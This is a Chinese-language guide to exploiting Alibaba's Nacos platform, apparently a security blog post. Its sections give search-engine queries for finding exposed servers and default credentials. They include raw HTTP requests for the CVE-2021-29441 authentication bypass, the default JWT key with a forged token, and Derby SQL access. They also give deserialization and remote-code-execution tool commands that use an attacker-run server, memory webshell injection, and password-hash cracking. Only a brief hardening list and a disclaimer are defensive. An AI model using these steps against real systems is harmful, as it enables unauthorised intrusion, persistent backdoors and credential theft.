Nacos漏洞复现与安全防护指南<\/h1>

1. Nacos简介<\/h2>
Nacos是一个由阿里巴巴开源的动态服务发现、配置管理和服务管理平台，用于构建云原生应用。它支持几乎所有主流类型的服务发现、配置和管理，包括Kubernetes Service、gRPC & Dubbo RPC Service、Spring Cloud RESTful Service等。<\/p>

默认开放端口<\/h3>

HTTP主端口<\/strong>: 8848（客户端、控制台及OpenAPI的HTTP通信）<\/li>
客户端gRPC端口<\/strong>: 9848（客户端向服务端发起gRPC连接和请求）<\/li>
服务端gRPC端口<\/strong>: 9849（服务间的数据同步）<\/li>

Jraft端口<\/strong>: 7848（集群管理中的选主和日志复制）<\/li> <\/ul>
2. 资产收集方法<\/h2>
FOFA搜索语法<\/h3>
app="nacos" && port="8848" || icon_hash="13942501" || icon_hash="1227052603" && port="8848" <\/code><\/pre> 3. 漏洞复现<\/h2> 3.1 获取Nacos版本信息<\/h3> 访问路径：<\/p> \/nacos\/v1\/console\/server\/state <\/code><\/pre> 3.2 默认口令漏洞<\/h3> 默认凭证：<\/p> nacos\/nacos <\/code><\/pre> 访问登录页面：<\/p> http:\/\/ip:8848\/nacos\/#\/login <\/code><\/pre> 3.3 未授权访问用户信息<\/h3> 当nacos.core.auth.enabled=false<\/code>时，可直接访问：<\/p> \/nacos\/v1\/auth\/users?pageNo=1&pageSize=9 <\/code><\/pre> 3.4 User-Agent权限绕过(CVE-2021-29441)<\/h3> 影响版本<\/strong>: <=Nacos 1.4.1<\/p> 漏洞原理<\/strong>: 当请求头中User-Agent设置为"Nacos-Server"时，系统会跳过认证。<\/p> 利用方法<\/strong>:<\/p> 查看用户列表：<\/li> <\/ol> \/nacos\/v1\/auth\/users?pageNo=1&pageSize=100 <\/code><\/pre> 添加用户(POST请求)：<\/li> <\/ol> POST<\/span> \/nacos\/v1\/auth\/users HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target_ip:8848<\/span> <\/span><\/span>User-Agent:<\/span> Nacos-Server<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span>Content-Length:<\/span> 30<\/span> <\/span><\/span> <\/span><\/span>username=test&password=test123 <\/span><\/span><\/code><\/pre> 删除用户：<\/li> <\/ol> DELETE<\/span> \/nacos\/v1\/auth\/users?username=test HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target_ip:8848<\/span> <\/span><\/span>User-Agent:<\/span> Nacos-Server<\/span> <\/span><\/span><\/code><\/pre>3.5 默认JWT密钥未授权访问<\/h3> 影响版本<\/strong>: 0.1.0 <= Nacos <= 2.2.0<\/p> 漏洞原理<\/strong>: 使用默认JWT密钥SecretKey012345678901234567890123456789012345678901234567890123456789<\/code>生成token。<\/p> 利用步骤<\/strong>:<\/p> 生成未来时间戳(如2080年)<\/li> 使用JWT.io生成token：<\/li> <\/ol> { <\/span><\/span> "sub"<\/span>: "nacos"<\/span>, <\/span><\/span> "iat"<\/span>: 1745835608<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre> 使用生成的token访问API：<\/li> <\/ol> \/nacos\/v1\/auth\/users?pageNo=1&pageSize=9&accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImlhdCI6MTc0NTgzNTYwOH0.gk9tFDRWDozKj-fsLAXSxnpojBklSaOVPNbUneqTSpw <\/code><\/pre> 3.6 Derby未授权访问(CVE-2021-29442)<\/h3> 影响版本<\/strong>:<\/p> Nacos <= 1.4.0（无论是否开启鉴权）<\/li> Nacos >1.4.0（未开启鉴权时）<\/li> <\/ul> 利用方法<\/strong>:<\/p> \/nacos\/v1\/cs\/ops\/derby?sql=select * from users <\/code><\/pre> 3.7 Nacos Client Yaml反序列化漏洞<\/h3> 影响版本<\/strong>: 1.4.1<\/p> 利用工具<\/strong>: yaml-payload<\/a><\/p> 利用步骤<\/strong>:<\/p> 编译生成恶意jar包<\/li> 上传到服务器并开启web服务<\/li> 利用Nacos配置中心触发反序列化<\/li> <\/ol> 3.8 Hessian反序列化漏洞<\/h3> 影响版本<\/strong>:<\/p> 1.4.0 <= Nacos < 1.4.6<\/li> 2.0.0 < Nacos < 2.2.3<\/li> <\/ul> 利用工具<\/strong>: NacosRce<\/a><\/p> 命令执行<\/strong>:<\/p> java -jar NacosRce.jar http:\/\/target_ip:8848\/nacos 7848<\/span> "whoami"<\/span> <\/span><\/span><\/code><\/pre>内存马注入<\/strong>:<\/p> 冰蝎内存马: 请求头x-client-data:rebeyond<\/code>, Referer设置为https:\/\/www.google.com\/<\/code><\/li> 哥斯拉内存马: 请求头x-client-data:godzilla<\/code>, Referer设置为https:\/\/www.google.com\/<\/code><\/li> CMD内存马: 请求头x-client-data:cmd<\/code>, 通过cmd<\/code>头执行命令<\/li> <\/ul> 3.9 Nacos RCE漏洞<\/h3> 利用路径<\/strong>:<\/p> \/nacos\/v1\/cs\/ops\/data\/removal \/nacos\/v1\/cs\/ops\/derby <\/code><\/pre> 利用工具<\/strong>: Nacos_Rce<\/a><\/p> 利用命令<\/strong>:<\/p> python Nacos_Rce.py -t vps_ip -p 5000<\/span> -u http:\/\/target_ip:8848 -c whoami <\/span><\/span><\/code><\/pre>3.10 密码破解<\/h3> bcrypt hash破解<\/strong>:<\/p> hashcat -a 0<\/span> -m 3200<\/span> hashes.txt rockyou.txt -w 3<\/span> -O -D 1,2 --show <\/span><\/span><\/code><\/pre>配置文件解密(jasypt)<\/strong>:<\/p> java -cp jasypt-1.9.3.jar org.jasypt.intf.cli.JasyptPBEStringDecryptionCLI input=<\/span>"MecKdyPwwkD+AqUKPy1GlQ=="<\/span> password=<\/span>"salt123"<\/span> algorithm=<\/span>"PBEWithMD5AndDES"<\/span> <\/span><\/span><\/code><\/pre>4. 常用API命令<\/h2> 获取服务器状态:<\/li> <\/ol> http:\/\/127.0.0.1:8848\/nacos\/v1\/console\/server\/state <\/code><\/pre> 精确查询用户:<\/li> <\/ol> http:\/\/127.0.0.1:8848\/nacos\/v1\/auth\/users?search=accurate&pageNo=1&pageSize=9 <\/code><\/pre> 添加用户:<\/li> <\/ol> curl -v --data-binary "username=test&password=123456"<\/span> "http:\/\/127.0.0.1:8848\/nacos\/v1\/auth\/users"<\/span> <\/span><\/span><\/code><\/pre> 修改密码:<\/li> <\/ol> curl -X PUT 'http:\/\/127.0.0.1:8848\/nacos\/v1\/auth\/users?accessToken='<\/span> -d 'username=test&newPassword=test123'<\/span> <\/span><\/span><\/code><\/pre> 获取配置信息:<\/li> <\/ol> http:\/\/127.0.0.1:8848\/nacos\/v1\/cs\/configs?search=accurate&dataId=&group=&pageNo=1&pageSize=99 <\/code><\/pre> 获取集群信息:<\/li> <\/ol> http:\/\/127.0.0.1:8848\/nacos\/v1\/core\/cluster\/nodes <\/code><\/pre> 用户登录:<\/li> <\/ol> curl --data-binary "username=nacos&password=nacos"<\/span> "http:\/\/127.0.0.1:8848\/nacos\/v1\/auth\/users\/login"<\/span> <\/span><\/span><\/code><\/pre>5. 安全建议<\/h2> 修改默认密码<\/li> 开启鉴权(nacos.core.auth.enabled=true<\/code>)<\/li> 修改默认JWT密钥<\/li> 限制7848端口的访问<\/li> 及时升级到最新版本<\/li> 监控异常API请求<\/li> 定期审计用户和权限<\/li> <\/ol> 6. 免责声明<\/h2> 本文仅用于安全研究和教育目的，所有测试应在授权环境下进行。未经授权对他人系统进行测试可能违反法律。<\/p>